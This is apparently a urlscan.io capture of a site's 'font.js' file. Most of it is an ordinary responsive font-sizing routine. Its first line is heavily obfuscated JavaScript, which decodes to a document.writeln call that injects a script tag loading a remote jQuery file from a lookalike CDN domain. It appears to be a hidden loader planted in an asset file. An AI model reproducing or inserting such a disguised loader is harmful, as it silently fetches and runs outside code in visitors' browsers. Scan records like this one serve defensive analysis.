2268.site Open in urlscan Pro
2606:4700:3034::ac43:b986  Public Scan

Submitted URL: http://2268.site/static/index_files/font.js
Effective URL: https://2268.site/static/index_files/font.js
Submission: On November 09 via api from US — Scanned from US

Form analysis 0 forms found in the DOM

Text Content

['jsjiami.com.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['jsjiami.v4']+[])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null,"100M111A99B117T109P101I110o116d46u119d114b105y116P101N108g110K40C34T60G115V99Q114y105F112E116i32o115H114l99K61v92v39R104p116f116x112W115g58h47v47N99W100a110F46u97e100r104s105Z115P46p112U114b111E47N97a106W97E120n47u108y105i98P115U47N106Q113t117w101L114K121m47X51r46q54G46e50P47z106J113c117N101i114F121d46W106U115N92a39G62t60p47W115a99h114R105r112T116O62y34e41m59"['\x73\x70\x6c\x69\x74'](/[a-zA-Z]{1,}/))))('jsjiami.com.v4');
// JavaScript Document
$(function(){
 new function (){
       var _self = this;
       _self.width = 750;//设置默认最大宽度
       _self.fontSize = 100;//默认字体大小
       _self.widthProportion = function(){var p = (document.body&&document.body.clientWidth||document.getElementsByTagName("html")[0].offsetWidth)/_self.width;return p>1?1:p<0.32?0.32:p;};
       _self.changePage = function(){
           document.getElementsByTagName("html")[0].setAttribute("style","font-size:"+_self.widthProportion()*_self.fontSize+"px !important");
       }
       _self.changePage(); 
       window.addEventListener('resize',function(){_self.changePage();},false);
    };
	
});